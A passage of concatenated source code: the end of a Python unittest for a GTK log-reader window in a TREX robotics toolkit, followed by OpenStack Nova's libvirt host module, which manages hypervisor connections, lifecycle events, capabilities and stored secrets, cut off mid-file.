# Create the gtk thread and window structure
def setUp(self):
# Initialize GTK Python threading functionality
gtk.gdk.threads_init()
# Create a new db reader
self.db_reader = DbReader()
# Create a new db reader window
self.db_reader_window = DbReaderWindow(self.db_reader)
# Create a new listener
self.listener = SimpleAssemblyListener()
# Register callbacks
self.db_reader_window.register_listener(self.listener.cb_rules)
self.db_reader_window.register_listener(self.listener.cb_tokens)
# Spawn the window
self.spawn_gtk_thread()
# Destroy window and kill gtk
def tearDown(self):
print "Killing The window..."
self.db_reader_window.w.destroy()
time.sleep(5)
# Test basic user-driven reading of logs
def test_reading(self):
# Wait for the window to come up
time.sleep(2)
# Define data constants
LOG_PATH = TREX.util.trex_path("tools/test/db_reader")
REACTORS = ["pr2.doorman","pr2.navigator","pr2.driver"]
TICKS = [(t,0) for t in range(0,10)]
GO_TICK = (5,0)
print "Setting the log path..."
self.db_reader_window.path_chooser.set_filename(LOG_PATH)
time.sleep(2)
print "Checking available data was loaded properly..."
# Assert the log path was loaded properly
self.assert_(LOG_PATH == self.db_reader_window.log_path)
# Assert the reactors were loaded properly
self.assert_(REACTORS == self.db_reader_window.reactor_names)
# Assert all the expected ticks were loaded properly
print self.db_reader_window.ticks
self.assert_(TICKS == self.db_reader_window.ticks)
print "Checking navigation buttons..."
self.db_reader_window.st_but.emit("clicked")
time.sleep(1)
self.assert_(self.db_reader_window.tick == TICKS[0])
self.db_reader_window.en_but.emit("clicked")
time.sleep(1)
self.assert_(self.db_reader_window.tick == TICKS[-1])
self.db_reader_window.bk_but.emit("clicked")
self.assert_(self.db_reader_window.tick == TICKS[-2])
time.sleep(1)
self.db_reader_window.fw_but.emit("clicked")
self.assert_(self.db_reader_window.tick == TICKS[-1])
print "Enabling assembly restriction..."
self.db_reader_window.assembly_ticks_only_check.set_active(True)
self.db_reader_window.assembly_ticks_only_check.emit("toggled")
time.sleep(4)
print "Checking listeners were notified..."
self.assert_(len(self.listener.rules) > 0)
self.assert_(len(self.listener.tokens) > 0)
print "Disabling assembly restriction..."
self.db_reader_window.assembly_ticks_only_check.set_active(False)
self.db_reader_window.assembly_ticks_only_check.emit("toggled")
time.sleep(4)
print "Checking tick entry..."
self.db_reader_window.tick_entry.set_text(self.db_reader_window.format_tick(GO_TICK))
time.sleep(1)
self.db_reader_window.go_but.emit("clicked")
time.sleep(1)
self.assert_(self.db_reader_window.tick == GO_TICK)
print "Checking invalid tick entry reversion..."
self.db_reader_window.tick_entry.set_text("100000")
time.sleep(1)
self.db_reader_window.go_but.emit("clicked")
time.sleep(1)
self.assert_(self.db_reader_window.tick == GO_TICK)
print "Moving to an empty path..."
self.db_reader_window.path_chooser.set_filename(os.path.abspath("."))
time.sleep(2)
print "Checking listeners were notified..."
self.assert_(len(self.listener.rules) == 0)
self.assert_(len(self.listener.tokens) == 0)
time.sleep(2)
def copy_children(self,src,dest):
# Copy each child into dest
for c in os.listdir(src):
if c[0] != '.':
if os.path.isdir(os.path.join(src,c)):
shutil.copytree(os.path.join(src,c),os.path.join(dest,c))
else:
shutil.copy2(os.path.join(src,c),os.path.join(dest,c))
def copy_ticks(self,src,dest,reactors,ticks):
for tick in ticks:
tick_name = "%d.%d.%s" % (tick[0],tick[1],DbReader.DB_EXT)
for r in reactors:
shutil.copy2(
os.path.join(src,r,DbReader.DB_PATH,tick_name),
os.path.join(dest,r,DbReader.DB_PATH,tick_name))
time.sleep(0.1)
# Test auto-reload functionality
def test_autoload(self):
# Wait for the window to come up
time.sleep(2)
SRC_LOG_PATH = TREX.util.trex_path("tools/test/db_reader")
LOG_PATH = TREX.util.trex_path("tools/test/db_reader_window")
REACTORS = ["pr2.doorman","pr2.navigator","pr2.driver"]
TICKS = [(i,0) for i in range(0,9)]
if os.path.exists(LOG_PATH):
print "Clearing log directory..."
shutil.rmtree(LOG_PATH)
print "Creating log directory..."
os.mkdir(LOG_PATH)
for r in REACTORS:
os.mkdir(os.path.join(LOG_PATH,r))
print "Setting the log path..."
self.db_reader_window.path_chooser.set_filename(LOG_PATH)
time.sleep(1.0)
print "Creating reactor directories"
for r in REACTORS:
os.mkdir(os.path.join(LOG_PATH,r,DbReader.ASSEMBLY_PATH))
os.mkdir(os.path.join(LOG_PATH,r,DbReader.DB_PATH))
time.sleep(1.0)
print "Checking for automatic reactor pick-up..."
print self.db_reader_window.reactor_names
self.assert_(REACTORS == self.db_reader_window.reactor_names)
print "Copying full plan dumps..."
for r in REACTORS:
self.copy_children(
os.path.join(SRC_LOG_PATH,r,DbReader.ASSEMBLY_PATH),
os.path.join(LOG_PATH,r,DbReader.ASSEMBLY_PATH))
print "Copying reactor states..."
self.copy_ticks(SRC_LOG_PATH,LOG_PATH,REACTORS,TICKS)
print "Checking for automatic tick pick-up..."
self.assert_(TICKS == self.db_reader_window.ticks)
print "Enabling automatic tick tracking..."
self.db_reader_window.latest_toggle.set_active(True)
self.db_reader_window.latest_toggle.emit("toggled")
time.sleep(2)
self.copy_ticks(SRC_LOG_PATH,LOG_PATH,REACTORS,[(9,0)])
time.sleep(0.1)
print "Checking for automatic tick tracking..."
self.assert_(self.db_reader_window.tick_entry.get_text() == self.db_reader_window.format_tick((9,0)))
print "Removing log directory..."
shutil.rmtree(LOG_PATH)
time.sleep(4)
print "Checking for no reactor pick-up..."
self.assert_(len(self.db_reader_window.reactor_names) == 0)
if __name__ == '__main__':
unittest.main()
|
host.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
from collections import defaultdict
import operator
import os
import socket
import sys
import threading
import traceback
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
from oslo_utils import versionutils
import six
from nova.compute import utils as compute_utils
import nova.conf
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova import rpc
from nova import utils
from nova.virt import event as virtevent
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import guest as libvirt_guest
from nova.virt.libvirt import utils as libvirt_utils
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue" if six.PY2 else "queue")
CONF = nova.conf.CONF
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._initial_connection = True
self._conn_event_handler = conn_event_handler
self._conn_event_handler_queue = six.moves.queue.Queue()
self._lifecycle_event_handler = lifecycle_event_handler
self._caps = None
self._domain_caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
self._initialized = False
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
def _conn_event_thread(self):
"""Dispatches async connection events"""
# NOTE(mdbooth): This thread doesn't need to jump through the same
# hoops as _dispatch_thread because it doesn't interact directly
# with the libvirt native thread.
while True:
self._dispatch_conn_event()
def _dispatch_conn_event(self):
# NOTE(mdbooth): Splitting out this loop looks redundant, but it
# means we can easily dispatch events synchronously from tests and
# it isn't completely awful.
handler = self._conn_event_handler_queue.get()
try:
handler()
except Exception:
LOG.exception(_('Exception handling connection event'))
finally:
self._conn_event_handler_queue.task_done()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
if detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_POSTCOPY:
transition = virtevent.EVENT_LIFECYCLE_POSTCOPY_STARTED
# FIXME(mriedem): VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED is also sent
# when live migration of the guest fails, so we cannot simply rely
# on the event itself but need to check if the job itself was
# successful.
# elif detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED:
# transition = virtevent.EVENT_LIFECYCLE_MIGRATION_COMPLETED
else:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.InternalError(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
self._queue_conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when an event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
utils.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
# This will raise an exception on failure
wrapped_conn = self._connect(self._uri, self._read_only)
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warning("URI %(uri)s does not support events: %(error)s",
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except libvirt.libvirtError as e:
LOG.warning("URI %(uri)s does not support connection"
" events: %(error)s",
{'uri': self._uri, 'error': e})
return wrapped_conn
def _queue_conn_event_handler(self, *args, **kwargs):
if self._conn_event_handler is None:
return
def handler():
return self._conn_event_handler(*args, **kwargs)
self._conn_event_handler_queue.put(handler)
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
# Drop the existing connection if it is not usable
if (self._wrapped_conn is not None and
not self._test_connection(self._wrapped_conn)):
self._wrapped_conn = None
# Connection was previously up, and went down
self._queue_conn_event_handler(
False, _('Connection to libvirt lost'))
if self._wrapped_conn is None:
try:
# This will raise if it fails to get a connection
self._wrapped_conn = self._get_new_connection()
except Exception as ex:
with excutils.save_and_reraise_exception():
# If we previously had a connection and it went down,
# we generated a down event for that above.
# We also want to generate a down event for an initial
# failure, which won't be handled above.
if self._initial_connection:
self._queue_conn_event_handler(
False,
_('Failed to connect to libvirt: %(msg)s') %
{'msg': ex})
finally:
self._initial_connection = False
self._queue_conn_event_handler(True, None)
return self._wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception(_("Connection to libvirt failed: %s"), ex)
payload = dict(ip=CONF.my_ip,
method='_connect',
reason=ex)
ctxt = nova_context.get_admin_context()
rpc.get_notifier('compute').error(ctxt,
'compute.libvirt.error',
payload)
compute_utils.notify_about_libvirt_connect_error(
ctxt, ip=CONF.my_ip, exception=ex, tb=traceback.format_exc())
raise exception.HypervisorUnavailable(host=CONF.host)
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
if self._initialized:
return
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
LOG.debug("Starting connection event dispatch thread")
utils.spawn(self._conn_event_thread)
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version,
versionutils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
versionutils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
def get_guest(self, instance):
"""Retrieve libvirt guest object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
return libvirt_guest.Guest(self._get_domain(instance))
def _get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a libvirt.Domain object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
try:
conn = self.get_connection()
return conn.lookupByUUIDString(instance.uuid)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance.uuid)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance.name,
'error_code': error_code,
'ex': ex})
raise exception.InternalError(msg)
def list_guests(self, only_running=True, only_guests=True):
"""Get a list of Guest objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
See method "list_instance_domains" for more information.
:returns: list of Guest objects
"""
return [libvirt_guest.Guest(dom) for dom in self.list_instance_domains(
only_running=only_running, only_guests=only_guests)]
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
alldoms = self.get_connection().listAllDomains(flags)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
Method is only used by NUMA code paths which check on
libvirt version >= 1.0.4. getCPUMap() was introduced in
libvirt 1.0.0.
:returns: set of online CPUs, raises libvirtError on error
"""
(cpus, cpu_map, online) = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
LOG.info("Libvirt host capabilities %s", xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
# NOTE(mriedem): Don't attempt to get baseline CPU features
# if libvirt can't determine the host cpu model.
if (hasattr(libvirt,
'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES') and
self._caps.host.cpu.model is not None):
try:
xml_str = self._caps.host.cpu.to_xml()
if six.PY3 and isinstance(xml_str, six.binary_type):
xml_str = xml_str.decode('utf-8')
features = self.get_connection().baselineCPU(
[xml_str],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
if features:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support full set"
" of host capabilities: %(error)s",
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_domain_capabilities(self):
"""Returns the capabilities you can request when creating a
domain (VM) with that hypervisor, for various combinations of
architecture and machine type.
In this context the fuzzy word "hypervisor" implies QEMU
binary, libvirt itself and the host config. libvirt provides
this in order that callers can determine what the underlying
emulator and/or libvirt is capable of, prior to creating a domain
(for instance via virDomainCreateXML or virDomainDefineXML).
However nova needs to know the capabilities much earlier, when
the host's compute service is first initialised, in order that
placement decisions can be made across many compute hosts.
Therefore this is expected to be called during the init_host()
phase of the driver lifecycle rather than just before booting
an instance.
This causes an additional complication since the Python
binding for this libvirt API call requires the architecture
and machine type to be provided. So in order to gain a full
picture of the hypervisor's capabilities, technically we need
to call it with the right parameters, once for each
(architecture, machine_type) combination which we care about.
However the libvirt experts have advised us that in practice
the domain capabilities do not (yet, at least) vary enough
across machine types to justify the cost of calling
getDomainCapabilities() once for every single (architecture,
machine_type) combination. In particular, SEV support isn't
reported per-machine type, and since there are usually many
machine types, we follow the advice of the experts that for
now it's sufficient to call it once per host architecture:
https://bugzilla.redhat.com/show_bug.cgi?id=1683471#c7
However, future domain capabilities might report SEV in a more
fine-grained manner, and we also expect to use this method to
detect other features, such as for gracefully handling machine
types and potentially for detecting OVMF binaries. Therefore
we memoize the results of the API calls in a nested dict where
the top-level keys are architectures, and second-level keys
are machine types, in order to allow easy expansion later.
Whenever libvirt/QEMU are updated, cached domCapabilities
would get outdated (because QEMU will contain new features and
the capabilities will vary). However, this should not be a
problem here, because when libvirt/QEMU gets updated, the
nova-compute agent also needs restarting, at which point the
memoization will vanish because it's not persisted to disk.
Note: The result is cached in the member attribute
_domain_caps.
:returns: a nested dict of dicts which maps architectures to
machine types to instances of config.LibvirtConfigDomainCaps
representing the domain capabilities of the host for that arch
and machine type:
{ arch:
{ machine_type: LibvirtConfigDomainCaps }
}
"""
if self._domain_caps:
return self._domain_caps
domain_caps = defaultdict(dict)
caps = self.get_capabilities()
virt_type = CONF.libvirt.virt_type
for guest in caps.guests:
arch = guest.arch
machine_type = \
libvirt_utils.get_default_machine_type(arch)
emulator_bin = guest.emulator
if virt_type in guest.domemulator:
emulator_bin = guest.domemulator[virt_type]
# It is expected that each <guest> will have a different
# architecture, but it doesn't hurt to add a safety net to
# avoid needlessly calling libvirt's API more times than
# we need.
if machine_type and machine_type in domain_caps[arch]:
continue
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this
# architecture. In that case we pass a machine_type of
# None to the libvirt API and rely on it choosing a
# sensible default which will be returned in the <machine>
# element. It could also be an alias like 'pc' rather
# than a full machine type.
#
# NOTE(kchamart): Prior to libvirt v4.7.0 libvirt picked
# its default machine type for x86, 'pc', as reported by
# QEMU's default. From libvirt v4.7.0 onwards, libvirt
# _explicitly_ declared the "preferred" default for x86 as
# 'pc' (and appropriate values for other architectures),
# and only uses QEMU's reported default (whatever that may
# be) if 'pc' does not exist. This was done "to isolate
# applications from hypervisor changes that may cause
# incompatibilities" -- i.e. if, or when, QEMU changes its
# default machine type to something else. Refer to this
# libvirt commit:
#
# https://libvirt.org/git/?p=libvirt.git;a=commit;h=26cfb1a3
try:
cap_obj = self._get_domain_capabilities(
emulator_bin=emulator_bin, arch=arch,
machine_type=machine_type, virt_type=virt_type)
except libvirt.libvirtError as ex:
# NOTE(sean-k-mooney): This can happen for several
# reasons, but one common example is if you have
# multiple QEMU emulators installed and you set
# virt-type=kvm. In this case any non-native emulator,
# e.g. AArch64 on an x86 host, will (correctly) raise
# an exception as KVM cannot be used to accelerate CPU
# instructions for non-native architectures.
error_code = ex.get_error_code()
LOG.debug(
"Error from libvirt when retrieving domain capabilities "
"for arch %(arch)s / virt_type %(virt_type)s / "
"machine_type %(mach_type)s: "
"[Error Code %(error_code)s]: %(exception)s",
{'arch': arch, 'virt_type': virt_type,
'mach_type': machine_type, 'error_code': error_code,
'exception': ex})
# Remove archs added by default dict lookup when checking
# if the machine type has already been recoded.
if arch in domain_caps:
domain_caps.pop(arch)
continue
# Register the domain caps using the expanded form of
# machine type returned by libvirt in the <machine>
# element (e.g. pc-i440fx-2.11)
if cap_obj.machine_type:
domain_caps[arch][cap_obj.machine_type] = cap_obj
else:
# NOTE(aspiers): In theory this should never happen,
# but better safe than sorry.
LOG.warning(
"libvirt getDomainCapabilities("
"emulator_bin=%(emulator_bin)s, arch=%(arch)s, "
"machine_type=%(machine_type)s, virt_type=%(virt_type)s) "
"returned null <machine> type",
{'emulator_bin': emulator_bin, 'arch': arch,
'machine_type': machine_type, 'virt_type': virt_type}
)
# And if we passed an alias, register the domain caps
# under that too.
if machine_type and machine_type != cap_obj.machine_type:
domain_caps[arch][machine_type] = cap_obj
cap_obj.machine_type_alias = machine_type
# NOTE(aspiers): Use a temporary variable to update the
# instance variable atomically, otherwise if some API
# calls succeeded and then one failed, we might
# accidentally memoize a partial result.
self._domain_caps = domain_caps
return self._domain_caps
def _get_domain_capabilities(self, emulator_bin=None, arch=None,
machine_type=None, virt_type=None, flags=0):
xmlstr = self.get_connection().getDomainCapabilities(
emulator_bin,
arch,
machine_type,
virt_type,
flags
)
LOG.debug("Libvirt host hypervisor capabilities for arch=%s and "
"machine_type=%s:\n%s", arch, machine_type, xmlstr)
caps = vconfig.LibvirtConfigDomainCaps()
caps.parse_str(xmlstr)
return caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.',
{'old': self._hostname, 'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
'rbd' will be converted to 'ceph'.
:param usage_id: name of resource in secret
:param password: optional secret value to set
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = False
secret_conf.private = False
secret_conf.usage_id = usage_id
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s', xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error('Error defining a secret with XML: %s', xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
